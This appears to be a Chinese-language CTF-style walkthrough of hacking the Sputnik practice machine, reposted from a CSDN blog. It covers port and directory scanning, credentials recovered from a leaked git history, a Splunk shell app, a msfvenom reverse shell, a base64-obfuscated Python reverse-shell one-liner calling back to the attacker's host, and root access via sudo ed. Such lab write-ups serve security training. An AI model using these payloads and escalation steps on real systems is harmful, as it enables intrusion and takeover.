首页 > 其他分享 >Sputnik 打靶渗透

Sputnik 打靶渗透

时间:2024-08-08 16:24:58浏览次数:14  
标签:__ git 查看 渗透 端口 打靶 192.168 python Sputnik

一、信息收集

1、查看靶机的MAC地址:

2、查看靶机的ip地址:

nmap 192.168.13.0/24

3、查看靶机开放的端口:

nmap -p- -sC -sT -sV -A 192.168.13.159

4、分别访问靶机的8089、55555和61337端口,发现在61337端口有一个登录框:

点击services和servicesNS是一个登录框

5、扫描各个网页的目录,查看是否有有效信息:

dirsearch -u "https://192.168.13.159:8089"  这个目录里面经过查看几乎没有什么有效信息

dirsearch -u "http://192.168.13.159:55555/"  发现这个目录里有.git源码泄露

dirsearch -u "http://192.168.13.159:61337"   这个登录页面扫描出来几乎都是404,没有有效信息

6、访问.git目录,并查看里面的内容:

7、在.git/logs/HEAD文件中,在里面发现一个clone记录:

8、对代码仓库进行clone,并查看源代码结构:

git clone https://github.com/ameerpornillos/flappy

9、使用git log命令用于显示代码提交的历史日志记录,在历史记录中找到一个secret记录,发现是一个账号和密码:

git log -p

+sputnik:ameer_says_thank_you_and_good_job

10、使用账号和密码登录61337端口:

账号:sputnik

密码:ameer_says_thank_you_and_good_job

11、在splunk上安装github公开工具,获取其shell并武器化:

从安装手册中得知,首先从 https://github.com/TBGSecurity/splunk_shells/archive/1.2.tar.gz 下载版本,然后在splunk中选择"Manage Apps" 并且点击 "Install app from file"

12、上载之后重启使其生效:

13、重启后输入账号密码重新登录后发现已经上传成功:

14、点击权限,选择所有应用然后保存:

15、选择app下的 Search&Reporting功能,在Search栏中可以进行命令执行:

16、反弹shell:

17、kali开启监听:

nc lvvp 5555

18、反弹成功并且查看到用户权限为普通用户:

19、获取一个交互式命令执行环境:

which python,发现本机安装了python环境:

msfvenom -p cmd/unix/reverse_python lhost=192.168.13.128 lport=6666 R

python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqNkFELgkAMx7+K+HQHMbsLxIh7kDCIqCB9l7wulOxOnH7/0gvao3vY2Pbb/mPNu3P9EKDTLzMEk61mj2PV9U4bRFJ0PtnNvnY4qFBsJYg4AbEBIZOQ9Ke9Kv4aqaHyQuAD+2XpoTxesoLK+0Z+3Z/KvLhl6ZnTNaCdtUYPjE1XkLlJlFPUITzGTjKEZ9Ma6xgn9HoxKRaTkpKd+v8R9L1tWRhVjY2wDvkHQj1eJA==')[0])))"

使用之前获得的shell执行命令,再监听6666端口,前一次执行命令报错是因为忘记监听了:

反弹成功,执行python -c 'import pty;pty.spawn("/bin/bash")'获得交互式shell:

二、提权

1、查看是否具有sudo权限:

sudo -l

2、查询ed进行sudo提权的命令,并使用命令进行提权,成功提到root权限:

sudo ed

!/bin/sh

标签:__,git,查看,渗透,端口,打靶,192.168,python,Sputnik
From: https://blog.csdn.net/m0_65112983/article/details/141026845

相关文章

  • 渗透测试实战-HFS远程RCE漏洞利用
    免责声明:文章来源于真实渗透测试,已获得授权,且关键信息已经打码处理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 一......
  • 【后渗透】windows远程下载文件命令汇总
    BitsadminCertutilpowershellFTPcscriptcmdl32Mspub.exeConfigSecurityPolicy.exeInstallutilPresentationhost.exeXwizard.exe其他前言我们在渗透过程中,当获取到一个shell能够执行命令的同时,想要上线c2,就要先将文件传输到目标,并用到一些命令行中的下载命令如BIT......
  • GitHub点赞飙升!电信大牛的Python渗透测试实战指南
    在网络安全领域,会不会编程,是区分“脚本小子”和真正黑客的关键。实际的渗透测试中会遇到各种复杂的网络环境,常用工具不一定能满足需求,这时就需要对现有工具进行扩展,或者编写符合要求的工具、自动化脚本,这都需要一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制脚本......
  • web渗透—SSRF
    一:SSRF介绍是一种由web服务器发出请求的漏洞;它能够请求到与它相连的内网资源;通过外网服务器当作跳板请求内网资源!二:SSRF常用函数(1)file_get_contents函数//可以读取本地文件;也可以通过url读取相关远程文件<?php $data=file_get_contents('url'); echo$data;?>(2)cur......
  • web渗透—文件上传
    文件上传一、原理1、通过文件长传模块上传一句话木马;然后用蚁剑或者cknife连接//一句话木马<?php@eval($_POST['cmd']);?>二、过滤和绕过1、前端验证原理:使用js代码对文件的类型进行限制绕过:(1)禁用Js脚本方法1:将网站源码复制带.htm文档中;删除js代码过滤的地方进行文件......
  • DC-7靶机渗透测试
    DC-7靶机DC:7~VulnHub文章目录DC-7靶机信息收集web渗透权限提升Drupal后台getshell权限提升靶机总结信息收集经过扫描得到IP地址为192.168.78.154.其中开启了ssh和80端口,看来立足点就在于web渗透找到漏洞,获取用户密码来进行ssh连接进行寻......
  • web渗透—RCE
    一:代码执行相关函数1、eval()函数与assert()函数(1)原理:将用户提交或者传递的字符串当作php代码执行;最终造成命令执行漏洞(2)passby:单引号绕过:闭合+注释;开启GPC的话就无法绕过(GPC就是将单引号转换为"反斜杠+单引号")eg:<?phphighlight_file(__FILE__);//高亮显示代码......
  • 打靶记录7——Hacker_Kid-v1
    靶机下载地址https://download.vulnhub.com/hackerkid/Hacker_Kid-v1.0.1.ova难度OSCP风格的中级难度靶机(只需要获取root权限即可,CTF风格的靶机就还需要获取flag)涉及的攻击方法:主机发现端口扫描Web信息收集DNS区域传输XXE注入攻击SSTI模版注入Capabilitie提权......
  • 【待做】【域渗透】获取域控方法总结
    搭建虚拟环境【域控】,192.168.10.3【域成员】,192.168.10.4工具mimikatzprocdump64在域渗透中、作为渗透测试人员,获取域控的权限基本上可以获取整个内网的权限。在大多数情况下,攻击者可以通过定位域管理员所登录的服务器,利用漏洞获取服务器system权限,找到域管理的账号、......
  • AMI-1 是一种有效的、具有细胞渗透性和可逆性的蛋白精氨酸 N-甲基转移酶 (PRMT) 抑制
    CAS:20324-87-2品牌:MedChemExpress(MCE)存储条件:4°C,sealedstorage,awayfrommoisture生物活性:AMI-1是一种有效的、具有细胞渗透性和可逆性的蛋白精氨酸N-甲基转移酶(PRMT) 抑制剂,IC50 为8.8人PRMT1和酵母Hmt1p分别为μM和3.0μM。AMI-1通过阻断肽-底......